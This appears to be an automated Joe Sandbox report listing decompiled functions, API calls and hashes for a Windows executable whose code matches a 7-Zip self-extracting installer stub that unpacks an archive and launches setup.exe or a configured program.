                                          • Instruction Fuzzy Hash: 0721D2B0A44705AFD718AFB6DC46BEE7BB8EF44714F10052FF9009A291DB3C85808A9C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 77%
                                          			E004055DE(void** __ecx, void* __eflags) {
                                          				signed int _t23;
                                          				signed int _t25;
                                          				void* _t36;
                                          				void** _t51;
                                          				void* _t53;
                                          
                                          				E00413954(E004196AC, _t53);
                                          				_t51 = __ecx;
                                          				_t23 = E0040551A(__ecx);
                                          				if(_t23 != 0) {
                                          					if( *0x423148 == 0) {
                                          						E00401C80(_t53 - 0x18,  *(_t53 + 8));
                                          						 *(_t53 - 4) =  *(_t53 - 4) & 0x00000000;
                                          						_t25 = AreFileApisANSI();
                                          						asm("sbb eax, eax");
                                          						_push( ~_t25 + 1);
                                          						 *_t51 = FindFirstFileA( *(E00403D04(_t53 - 0x24)), _t53 - 0x164);
                                          						E00403A9C( *((intOrPtr*)(_t53 - 0x24)));
                                          						 *(_t53 - 4) =  *(_t53 - 4) | 0xffffffff;
                                          						E00403A9C( *((intOrPtr*)(_t53 - 0x18)));
                                          						__eflags =  *_t51 - 0xffffffff;
                                          						if(__eflags != 0) {
                                          							E00405705(_t53 - 0x164,  *((intOrPtr*)(_t53 + 0xc)), __eflags);
                                          						}
                                          					} else {
                                          						_t36 = FindFirstFileW( *(_t53 + 8), _t53 - 0x3b4); // executed
                                          						_t61 = _t36 - 0xffffffff;
                                          						 *_t51 = _t36;
                                          						if(_t36 != 0xffffffff) {
                                          							E004056A6(_t53 - 0x3b4,  *((intOrPtr*)(_t53 + 0xc)), _t61);
                                          						}
                                          					}
                                          					_t23 = 0 |  *_t51 != 0xffffffff;
                                          				}
                                          				 *[fs:0x0] =  *((intOrPtr*)(_t53 - 0xc));
                                          				return _t23;
                                          			}









                                          APIs
                                          • __EH_prolog.LIBCMT ref: 004055E3
                                            • Part of subcall function 0040551A: FindClose.KERNELBASE(?,000000FF,0040554B,000000FF), ref: 00405525
                                          • FindFirstFileW.KERNELBASE(?,?), ref: 00405611
                                          • AreFileApisANSI.KERNEL32(?), ref: 0040563D
                                          • FindFirstFileA.KERNEL32(?,?,00000001), ref: 0040565E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: FileFind$First$ApisCloseH_prolog
                                          • String ID:
                                          • API String ID: 4121580741-0
                                          • Opcode ID: fcb5256250039c908afd196fb8e76c17c38080862ebf91937f58451f3d562862
                                          • Instruction ID: 53571c6d670a3437f98eaf3b47711b77fa147e423a783867877babb07b55427d
                                          • Opcode Fuzzy Hash: fcb5256250039c908afd196fb8e76c17c38080862ebf91937f58451f3d562862
                                          • Instruction Fuzzy Hash: AB21813180050ADFCF11EF60C8459EEBB75EF00329F10476AE4A5B61E1DB399A85CF48
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0040553A(void** __ecx, void* __eflags, CHAR* _a4, intOrPtr _a8) {
                                          				struct _WIN32_FIND_DATAA _v324;
                                          				void* _t8;
                                          				void** _t14;
                                          
                                          				_t14 = __ecx;
                                          				if(E0040551A(__ecx) == 0) {
                                          					L2:
                                          					return 0;
                                          				}
                                          				_t8 = FindFirstFileA(_a4,  &_v324); // executed
                                          				 *_t14 = _t8;
                                          				if(_t8 != 0xffffffff) {
                                          					E0040557F( &_v324, _a8, __eflags);
                                          					return 1;
                                          				}
                                          				goto L2;
                                          			}







                                          APIs
                                            • Part of subcall function 0040551A: FindClose.KERNELBASE(?,000000FF,0040554B,000000FF), ref: 00405525
                                          • FindFirstFileA.KERNELBASE(?,?,000000FF), ref: 00405559
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: Find$CloseFileFirst
                                          • String ID:
                                          • API String ID: 2295610775-0
                                          • Opcode ID: 4d5417fc6ca074e65557f02866c61fee52306747aaa4eef42dce5467d8724910
                                          • Instruction ID: 4d0f5172a85985fc9641596f45f8b0e99eb03685ed3a07152804d04183bf4296
                                          • Opcode Fuzzy Hash: 4d5417fc6ca074e65557f02866c61fee52306747aaa4eef42dce5467d8724910
                                          • Instruction Fuzzy Hash: 5DE0923040050876CB20BF35DC019EB776AEF11398F104276F955672E5D738D9468F98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0041584A() {
                                          				_Unknown_base(*)()* _t1;
                                          
                                          				_t1 = SetUnhandledExceptionFilter(E00415804); // executed
                                          				 *0x4233b0 = _t1;
                                          				return _t1;
                                          			}





                                          APIs
                                          • SetUnhandledExceptionFilter.KERNELBASE(Function_00015804), ref: 0041584F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
                                          • Opcode ID: 606abe9215baac8c82b0634bac82feb5658c8fb73c9735c67e630ff6bf3afee2
                                          • Instruction ID: 76677b13eed7a87b3dd700732a0fedcf1c6828d453a24416ba8446ce1f8cc847
                                          • Opcode Fuzzy Hash: 606abe9215baac8c82b0634bac82feb5658c8fb73c9735c67e630ff6bf3afee2
                                          • Instruction Fuzzy Hash: 6CA022F0280300CF8B00AF20AC082C03E30F28830330000B3B80080238CF380388CA2C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetUnhandledExceptionFilter.KERNELBASE ref: 00415861
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
                                          • Opcode ID: 1d24ef28bc6494d4f32e17e582550bcecd4607126de7dd0e3447cde8bb60405a
                                          • Instruction ID: 9f5714f3741d262582d91aa49c58cb07bd20065c27159592644951a243d3f8b5
                                          • Opcode Fuzzy Hash: 1d24ef28bc6494d4f32e17e582550bcecd4607126de7dd0e3447cde8bb60405a
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 90%
                                          			E00401014(void* __eflags, void* _a4, signed int _a7) {
                                          				signed int _v5;
                                          				char _v20;
                                          				struct HWND__* _v24;
                                          				struct HWND__* _v28;
                                          				char _v32;
                                          				struct HWND__* _v36;
                                          				signed int _v40;
                                          				signed int _v44;
                                          				struct HWND__* _v48;
                                          				struct HWND__* _v52;
                                          				char _v56;
                                          				WCHAR* _v68;
                                          				struct HWND__* _v72;
                                          				struct HWND__* _v76;
                                          				char _v80;
                                          				struct HWND__* _v84;
                                          				struct HWND__* _v88;
                                          				char _v92;
                                          				struct HWND__* _v96;
                                          				struct HWND__* _v100;
                                          				char _v104;
                                          				struct HWND__* _v108;
                                          				struct HWND__* _v112;
                                          				char _v116;
                                          				CHAR* _v128;
                                          				CHAR* _v140;
                                          				char _v144;
                                          				struct HWND__* _v148;
                                          				struct HWND__* _v152;
                                          				char _v156;
                                          				intOrPtr _v164;
                                          				char _v176;
                                          				char _v188;
                                          				char _v200;
                                          				char _v212;
                                          				char _v216;
                                          				CHAR* _v228;
                                          				struct _PROCESS_INFORMATION _v244;
                                          				struct _STARTUPINFOA _v312;
                                          				void* __ebp;
                                          				char _t280;
                                          				intOrPtr* _t294;
                                          				void* _t297;
                                          				void* _t302;
                                          				signed int _t306;
                                          				signed int _t308;
                                          				signed int _t314;
                                          				signed int _t318;
                                          				signed int _t339;
                                          				void* _t375;
                                          				signed char _t384;
                                          				signed int _t423;
                                          				signed int _t436;
                                          				int _t466;
                                          				intOrPtr _t501;
                                          				void* _t619;
                                          				void* _t620;
                                          				void* _t635;
                                          				signed int _t636;
                                          				signed int _t640;
                                          				signed int _t642;
                                          				void* _t643;
                                          				char** _t644;
                                          
                                          				 *0x423144 = _a4;
                                          				_t280 = E00401A51();
                                          				_t635 = 3;
                                          				 *0x423148 = _t280;
                                          				_v156 = 0;
                                          				_v152 = 0;
                                          				_v148 = 0;
                                          				E00402170( &_v156, _t635);
                                          				_v32 = 0;
                                          				_v28 = 0;
                                          				_v24 = 0;
                                          				E00402170( &_v32, _t635);
                                          				_v80 = 0;
                                          				_v76 = 0;
                                          				_v72 = 0;
                                          				E00402170( &_v80, _t635);
                                          				_v116 = 0;
                                          				_v112 = 0;
                                          				_v108 = 0;
                                          				E00402170( &_v116, _t635);
                                          				E00401C80( &_v68, GetCommandLineW());
                                          				_push( &_v32);
                                          				E004038EE( &_v68,  &_v156);
                                          				E00403A9C(_v68);
                                          				_v104 = 0;
                                          				_v100 = 0;
                                          				_v96 = 0;
                                          				E00402170( &_v104, _t635);
                                          				_t501 =  *0x423144; // 0x400000
                                          				E004045E2(_t501,  &_v104);
                                          				E0040235E( &_v32);
                                          				E00402323( &_v32);
                                          				_a7 = 0;
                                          				_t294 = E00401C80( &_v68, L"-y");
                                          				E00401E3A( &_v32,  &_v20, 2);
                                          				_t297 = E00403B4F( *_t294);
                                          				E00403A9C(_v20);
                                          				E00403A9C(_v68);
                                          				_t649 = _t297;
                                          				if(_t297 == 0) {
                                          					_a7 = 1;
                                          					E00401D7A( &_v32, E00401E19( &_v32,  &_v20, 2));
                                          					E00403A9C(_v20);
                                          					E0040235E( &_v32);
                                          					E00402323( &_v32);
                                          				}
                                          				_v92 = 0;
                                          				_v88 = 0;
                                          				_v84 = 0;
                                          				E0040243E( &_v92, _t635);
                                          				_push( &_v92);
                                          				_push(";!@InstallEnd@!");
                                          				_t302 = E00401AF4(_v104, ";!@Install@!UTF-8!", _t649); // executed
                                          				if(_t302 != 0) {
                                          					E00401C80( &_v212, L".\\");
                                          					_v56 = 0;
                                          					_v52 = 0;
                                          					_v48 = 0;
                                          					E00402170( &_v56, _t635);
                                          					__eflags = _v88;
                                          					_v216 = 1;
                                          					if(_v88 == 0) {
                                          						L21:
                                          						_v144 = 0;
                                          						E00401ECD( &_v140);
                                          						_t306 = E00405298( &_v144, _t643,  *0x420060);
                                          						__eflags = _t306;
                                          						if(_t306 != 0) {
                                          							_push(0x1c);
                                          							_t640 = E00403A76();
                                          							__eflags = _t640;
                                          							if(_t640 == 0) {
                                          								_t636 = 0;
                                          								__eflags = 0;
                                          							} else {
                                          								_t139 = _t640 + 8; // 0x8
                                          								 *((intOrPtr*)(_t640 + 4)) = 0;
                                          								E00401F0D(_t139);
                                          								 *_t640 = 0x41b328;
                                          								_t636 = _t640;
                                          							}
                                          							__eflags = _t636;
                                          							if(_t636 != 0) {
                                          								 *((intOrPtr*)( *_t636 + 4))(_t636);
                                          							}
                                          							_t308 = E00408107(_t636);
                                          							__eflags = _t308;
                                          							if(_t308 == 0) {
                                          								E00401A03();
                                          								_v5 = 0;
                                          								_v44 = 0;
                                          								_v40 = 0;
                                          								_v36 = 0;
                                          								E00402170( &_v44, 3);
                                          								_push( &_v44);
                                          								_push( &_v5);
                                          								_push(_v216);
                                          								_push( &_v200); // executed
                                          								_t314 = E00402F15(_t636,  &_v104, __eflags); // executed
                                          								__eflags = _t314;
                                          								if(_t314 == 0) {
                                          									E00403A9C(_v44);
                                          									E00401ECD( &_v128);
                                          									E00405033( &_v128);
                                          									_t318 = SetCurrentDirectoryA(_v140); // executed
                                          									__eflags = _t318;
                                          									if(_t318 != 0) {
                                          										__eflags = _v76;
                                          										if(_v76 == 0) {
                                          											__eflags = _v52;
                                          											if(_v52 != 0) {
                                          												L57:
                                          												E00401CE1( &_v68,  &_v200);
                                          												E00405D0B( &_v68);
                                          												E00401C80( &_v20, L"%%T\\");
                                          												E00401E56( &_v56,  &_v20,  &_v68);
                                          												E00403A9C(_v20);
                                          												E00403A9C(_v68);
                                          												E00401C80( &_v20, L"%%T");
                                          												E00401E56( &_v56,  &_v20,  &_v200);
                                          												E00403A9C(_v20);
                                          												__eflags = _v28;
                                          												if(_v28 != 0) {
                                          													E00401DB8( &_v56, 0x20);
                                          													E00401DE3( &_v56,  &_v32);
                                          												}
                                          												_push( &_v56);
                                          												_v312.cb = 0x44;
                                          												_v312.lpReserved = 0;
                                          												_v312.lpDesktop.cbSize = 0;
                                          												_v312.lpTitle = 0;
                                          												_v312.dwFlags = 0;
                                          												_v312.cbReserved2 = 0;
                                          												_v312.lpReserved2 = 0;
                                          												E00402634( &_v188,  &_v212);
                                          												E00401A18();
                                          												E00403A9C(_v188);
                                          												_t339 = CreateProcessA(0, _v228, 0, 0, 0, 0, 0, 0,  &_v312,  &_v244); // executed
                                          												__eflags = _t339;
                                          												if(_t339 != 0) {
                                          													CloseHandle(_v244.hThread);
                                          													_a4 = _v244.hProcess;
                                          													E00403A9C(_v228);
                                          													L69:
                                          													__eflags = _a4;
                                          													if(_a4 != 0) {
                                          														WaitForSingleObject(_a4, 0xffffffff);
                                          														CloseHandle(_a4);
                                          													}
                                          													SetCurrentDirectoryA(_v128); // executed
                                          													E00403A9C(_v128);
                                          													E00403A9C(_v200);
                                          													__eflags = _t636;
                                          													if(_t636 != 0) {
                                          														 *((intOrPtr*)( *_t636 + 8))(_t636);
                                          													}
                                          													goto L73;
                                          												} else {
                                          													__eflags = _a7;
                                          													if(_a7 == 0) {
                                          														__eflags = 0;
                                          														E00411127(0);
                                          													}
                                          													E00403A9C(_v228);
                                          													L63:
                                          													L64:
                                          													SetCurrentDirectoryA(_v128);
                                          													_push(_v128);
                                          													L65:
                                          													E00403A9C();
                                          													E00403A9C(_v200);
                                          													__eflags = _t636;
                                          													if(_t636 != 0) {
                                          														 *((intOrPtr*)( *_t636 + 8))(_t636);
                                          													}
                                          													E00401A2D( &_v144);
                                          													E00403A9C(_v140);
                                          													E00403A9C(_v56);
                                          													E00403A9C(_v212);
                                          													E00403A9C(_v92);
                                          													E00403A9C(_v104);
                                          													E00403A9C(_v116);
                                          													E00403A9C(_v80);
                                          													E00403A9C(_v32);
                                          													E00403A9C(_v156);
                                          													_t375 = 1;
                                          													return _t375;
                                          												}
                                          											}
                                          											E00401D1B( &_v56, L"setup.exe");
                                          											_t384 = E0040587C( *((intOrPtr*)(E00401A18())),  &_v56, __eflags);
                                          											asm("sbb al, al");
                                          											_v5 =  ~_t384 + 1;
                                          											E00403A9C(_v188);
                                          											__eflags = _v5;
                                          											if(_v5 == 0) {
                                          												goto L57;
                                          											}
                                          											__eflags = _a7;
                                          											if(_a7 == 0) {
                                          												E00411093(0, L"Can not find setup.exe");
                                          											}
                                          											goto L64;
                                          										}
                                          										E00401A18();
                                          										__eflags = _v28;
                                          										_v312.lpDesktop.cbSize = 0x3c;
                                          										_v312.lpTitle = 0x140;
                                          										_v312.dwX = 0;
                                          										_v312.dwY = 0;
                                          										_v312.dwXSize = _v68;
                                          										if(_v28 != 0) {
                                          											E00401DE3( &_v116,  &_v32);
                                          										}
                                          										E00401A18();
                                          										_v312.dwXCountChars = 0;
                                          										asm("sbb eax, eax");
                                          										_v312.dwYCountChars = 1;
                                          										_v312.hStdError = 0;
                                          										_v312.dwYSize =  ~_v40 & _v44;
                                          										ShellExecuteExA( &(_v312.lpDesktop));
                                          										__eflags = _v312.dwFillAttribute - 0x20;
                                          										if(_v312.dwFillAttribute > 0x20) {
                                          											_a4 = _v312.hStdError;
                                          											E00403A9C(_v44);
                                          											E00403A9C(_v68);
                                          											goto L69;
                                          										} else {
                                          											__eflags = _a7;
                                          											if(_a7 == 0) {
                                          												__eflags = 0;
                                          												E00411093(0, L"Can not open file");
                                          											}
                                          											E00403A9C(_v44);
                                          											E00403A9C(_v68);
                                          											goto L63;
                                          										}
                                          									}
                                          									SetCurrentDirectoryA(_v128);
                                          									E00403A9C(_v128);
                                          									E00403A9C(_v200);
                                          									goto L43;
                                          								}
                                          								__eflags = _a7;
                                          								if(_a7 != 0) {
                                          									L40:
                                          									_push(_v44);
                                          									goto L65;
                                          								}
                                          								__eflags = _t314 - 1;
                                          								if(_t314 == 1) {
                                          									L36:
                                          									_t619 = 8;
                                          									E00401D7A( &_v44, E0040602F(_t619));
                                          									E00403A9C(_v188);
                                          									_t314 = 0x80004005;
                                          									L37:
                                          									__eflags = _t314 - 0x80004004;
                                          									if(_t314 != 0x80004004) {
                                          										__eflags = _v40;
                                          										if(_v40 != 0) {
                                          											_t620 = 7;
                                          											MessageBoxW(0, _v44,  *(E0040602F(_t620)), 0x10);
                                          											E00403A9C(_v188);
                                          										}
                                          									}
                                          									goto L40;
                                          								}
                                          								__eflags = _v5;
                                          								if(_v5 == 0) {
                                          									goto L37;
                                          								}
                                          								goto L36;
                                          							} else {
                                          								E00411093(0, L"Can not load codecs");
                                          								L43:
                                          								__eflags = _t636;
                                          								if(_t636 != 0) {
                                          									 *((intOrPtr*)( *_t636 + 8))(_t636);
                                          								}
                                          								L24:
                                          								_push(1);
                                          								_pop(0);
                                          								L73:
                                          								E00401A2D( &_v144);
                                          								E00403A9C(_v140);
                                          								E00403A9C(_v56);
                                          								E00403A9C(_v212);
                                          								_t644 =  &(_t644[3]);
                                          								goto L74;
                                          							}
                                          						}
                                          						__eflags = _a7;
                                          						if(_a7 == 0) {
                                          							__eflags = 0;
                                          							E00411093(0, L"Can not create temp folder archive");
                                          						}
                                          						goto L24;
                                          					}
                                          					E00402155( &_v176);
                                          					_v176 = 0x41b334;
                                          					_t423 = E00403D5A( &_v92,  &_v176);
                                          					__eflags = _t423;
                                          					if(_t423 != 0) {
                                          						E00401C80( &_v20, L"Title");
                                          						E00404073( &_v68,  &_v176,  &_v20);
                                          						E00403A9C(_v20);
                                          						 *_t644 = L"BeginPrompt";
                                          						E00401C80( &_v20);
                                          						E00404073( &_v44,  &_v176,  &_v20);
                                          						E00403A9C(_v20);
                                          						 *_t644 = L"Progress";
                                          						E00401C80( &_v20);
                                          						E00404073( &_v228,  &_v176,  &_v20);
                                          						E00403A9C(_v20);
                                          						_t436 = E00403B4F(L"no");
                                          						__eflags = _t436;
                                          						if(_t436 == 0) {
                                          							_v216 = 0;
                                          						}
                                          						E00401C80( &_v20, L"Directory");
                                          						_t642 = E00404041( &_v176,  &_v20);
                                          						E00403A9C(_v20);
                                          						__eflags = _t642;
                                          						if(_t642 >= 0) {
                                          							__eflags =  *((intOrPtr*)(_v164 + _t642 * 4)) + 0xc;
                                          							E00401D7A( &_v212,  *((intOrPtr*)(_v164 + _t642 * 4)) + 0xc);
                                          						}
                                          						__eflags = _v40;
                                          						if(_v40 == 0) {
                                          							L20:
                                          							E00401C80( &_v20, L"RunProgram");
                                          							E00401D7A( &_v56, E00404073( &(_v244.hThread),  &_v176,  &_v20));
                                          							E00403A9C(_v244.hThread);
                                          							E00403A9C(_v20);
                                          							E00401C80( &_v20, L"ExecuteFile");
                                          							E00401D7A( &_v80, E00404073( &(_v244.hThread),  &_v176,  &_v20));
                                          							E00403A9C(_v244.hThread);
                                          							E00403A9C(_v20);
                                          							E00401C80( &_v20, L"ExecuteParameters");
                                          							_push( &_v32);
                                          							E00401D7A( &_v116, E00402634( &(_v244.hThread), E00404073( &_v188,  &_v176,  &_v20)));
                                          							E00403A9C(_v244.hThread);
                                          							E00403A9C(_v188);
                                          							E00403A9C(_v20);
                                          							E00403A9C(_v228);
                                          							E00403A9C(_v44);
                                          							E00403A9C(_v68);
                                          							_t644 =  &(_t644[6]);
                                          							_v176 = 0x41b334;
                                          							E004042D6();
                                          							E004042AD( &_v176);
                                          							goto L21;
                                          						} else {
                                          							__eflags = _a7;
                                          							if(_a7 != 0) {
                                          								goto L20;
                                          							}
                                          							_t466 = MessageBoxW(0, _v44, _v68, 0x24);
                                          							__eflags = _t466 - 6;
                                          							if(_t466 == 6) {
                                          								goto L20;
                                          							}
                                          							E00403A9C(_v228);
                                          							E00403A9C(_v44);
                                          							E00403A9C(_v68);
                                          							_t644 =  &(_t644[3]);
                                          							L19:
                                          							_v176 = 0x41b334;
                                          							E004042D6();
                                          							E004042AD( &_v176);
                                          							E00403A9C(_v56);
                                          							E00403A9C(_v212);
                                          							E00403A9C(_v92);
                                          							E00403A9C(_v104);
                                          							E00403A9C(_v116);
                                          							E00403A9C(_v80);
                                          							E00403A9C(_v32);
                                          							E00403A9C(_v156);
                                          							goto L75;
                                          						}
                                          					}
                                          					__eflags = _a7;
                                          					if(_a7 == 0) {
                                          						__eflags = 0;
                                          						E00411093(0, L"Config failed");
                                          					}
                                          					_push(1);
                                          					_pop(0);
                                          					goto L19;
                                          				} else {
                                          					if(_a7 == 0) {
                                          						E00411093(0, L"Can\'t load config info");
                                          					}
                                          					_push(1);
                                          					_pop(0);
                                          					L74:
                                          					E00403A9C(_v92);
                                          					E00403A9C(_v104);
                                          					E00403A9C(_v116);
                                          					E00403A9C(_v80);
                                          					E00403A9C(_v32);
                                          					E00403A9C(_v156);
                                          					L75:
                                          					return 0;
                                          				}
                                          			}


































































                                          0x00401675
                                          0x0040167f
                                          0x00401685
                                          0x0040168b
                                          0x00401691
                                          0x0040169a
                                          0x0040169a
                                          0x004016a5
                                          0x004016ad
                                          0x004016b5
                                          0x004016b7
                                          0x004016c4
                                          0x004016ca
                                          0x004016d7
                                          0x004016dd
                                          0x004016e4
                                          0x00401716
                                          0x00401719
                                          0x00401721
                                          0x00000000
                                          0x004016e6
                                          0x004016e6
                                          0x004016e9
                                          0x004016f0
                                          0x004016f2
                                          0x004016f2
                                          0x004016fa
                                          0x00401702
                                          0x00000000
                                          0x00401707
                                          0x004016e4
                                          0x00401627
                                          0x0040162c
                                          0x00401637
                                          0x00000000
                                          0x0040163d
                                          0x00401585
                                          0x00401588
                                          0x004015f1
                                          0x004015f1
                                          0x00000000
                                          0x004015f1
                                          0x0040158a
                                          0x0040158d
                                          0x00401594
                                          0x0040159c
                                          0x004015a6
                                          0x004015b1
                                          0x004015b7
                                          0x004015bc
                                          0x004015bc
                                          0x004015c1
                                          0x004015c3
                                          0x004015c6
                                          0x004015d0
                                          0x004015df
                                          0x004015eb
                                          0x004015f0
                                          0x004015c6
                                          0x00000000
                                          0x004015c1
                                          0x0040158f
                                          0x00401592
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040152a
                                          0x00401531
                                          0x0040163e
                                          0x0040163e
                                          0x00401640
                                          0x00401649
                                          0x00401649
                                          0x004014e8
                                          0x004014e8
                                          0x004014ea
                                          0x00401998
                                          0x0040199e
                                          0x004019a9
                                          0x004019b1
                                          0x004019bc
                                          0x004019c1
                                          0x00000000
                                          0x004019c1
                                          0x00401528
                                          0x004014d7
                                          0x004014da
                                          0x004014e1
                                          0x004014e3
                                          0x004014e3
                                          0x00000000
                                          0x004014da
                                          0x004011d7
                                          0x004011ea
                                          0x004011f0
                                          0x004011f5
                                          0x004011f7
                                          0x0040121a
                                          0x0040122c
                                          0x00401234
                                          0x0040123c
                                          0x00401243
                                          0x00401255
                                          0x0040125d
                                          0x00401265
                                          0x0040126c
                                          0x00401281
                                          0x00401289
                                          0x0040129a
                                          0x0040129f
                                          0x004012a1
                                          0x004012a3
                                          0x004012a3
                                          0x004012b1
                                          0x004012c7
                                          0x004012c9
                                          0x004012ce
                                          0x004012d1
                                          0x004012e2
                                          0x004012e6
                                          0x004012e6
                                          0x004012eb
                                          0x004012ee
                                          0x0040139d
                                          0x004013a5
                                          0x004013c3
                                          0x004013ce
                                          0x004013d6
                                          0x004013e5
                                          0x00401403
                                          0x0040140e
                                          0x00401416
                                          0x00401425
                                          0x00401433
                                          0x00401454
                                          0x0040145f
                                          0x0040146a
                                          0x00401472
                                          0x0040147d
                                          0x00401485
                                          0x0040148d
                                          0x00401492
                                          0x0040149b
                                          0x004014a1
                                          0x004014ac
                                          0x00000000
                                          0x004012f4
                                          0x004012f4
                                          0x004012f7
                                          0x00000000
                                          0x00000000
                                          0x00401306
                                          0x0040130c
                                          0x0040130f
                                          0x00000000
                                          0x00000000
                                          0x0040131b
                                          0x00401323
                                          0x0040132b
                                          0x00401330
                                          0x00401333
                                          0x00401339
                                          0x0040133f
                                          0x0040134a
                                          0x00401352
                                          0x0040135d
                                          0x00401365
                                          0x0040136d
                                          0x00401375
                                          0x0040137d
                                          0x00401385
                                          0x00401390
                                          0x00000000
                                          0x00401395
                                          0x004012ee
                                          0x004011f9
                                          0x004011fc
                                          0x00401203
                                          0x00401205
                                          0x00401205
                                          0x0040120a
                                          0x0040120c
                                          0x00000000
                                          0x00401186
                                          0x00401189
                                          0x00401192
                                          0x00401192
                                          0x00401197
                                          0x00401199
                                          0x004019c4
                                          0x004019c7
                                          0x004019cf
                                          0x004019d7
                                          0x004019df
                                          0x004019e7
                                          0x004019f2
                                          0x004019fa
                                          0x00000000
                                          0x004019fa

                                          APIs
                                            • Part of subcall function 00401A51: GetVersionExA.KERNEL32(?), ref: 00401A6B
                                          • GetCommandLineW.KERNEL32(00000003,00000003,00000003,00000003,?,00000000), ref: 0040108B
                                            • Part of subcall function 004038EE: __EH_prolog.LIBCMT ref: 004038F3
                                            • Part of subcall function 004045E2: __EH_prolog.LIBCMT ref: 004045E7
                                            • Part of subcall function 004045E2: GetModuleFileNameW.KERNEL32(?,?,00000105,00000003,00000000,00000000), ref: 00404618
                                            • Part of subcall function 0040235E: __EH_prolog.LIBCMT ref: 00402363
                                            • Part of subcall function 00402323: __EH_prolog.LIBCMT ref: 00402328
                                            • Part of subcall function 00403D5A: __EH_prolog.LIBCMT ref: 00403D5F
                                          • MessageBoxW.USER32(00000000,?,?,00000010), ref: 004015DF
                                          • SetCurrentDirectoryA.KERNELBASE(?,?,00000001,?,?,00000003,00000003,0042023C,;!@InstallEnd@!,?,00000003,00000000,00000002,00420274,00000003,?), ref: 0040161E
                                          • SetCurrentDirectoryA.KERNEL32(?,?,00000000), ref: 00401627
                                          • ShellExecuteExA.SHELL32(0000003C,?,00000000), ref: 004016D7
                                          • MessageBoxW.USER32(00000000,?,?,00000024), ref: 00401306
                                            • Part of subcall function 00411093: MessageBoxW.USER32(00000000,?,7-Zip,00000010), ref: 0041109C
                                            • Part of subcall function 00402F15: __EH_prolog.LIBCMT ref: 00402F1A
                                          • SetCurrentDirectoryA.KERNEL32(?,?,00000000), ref: 004018B2
                                          • CloseHandle.KERNEL32(?,?,00000000), ref: 00401940
                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00401965
                                          • CloseHandle.KERNEL32(?,?,00000000), ref: 0040196E
                                          • SetCurrentDirectoryA.KERNELBASE(?,?,00000000), ref: 00401977
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmp
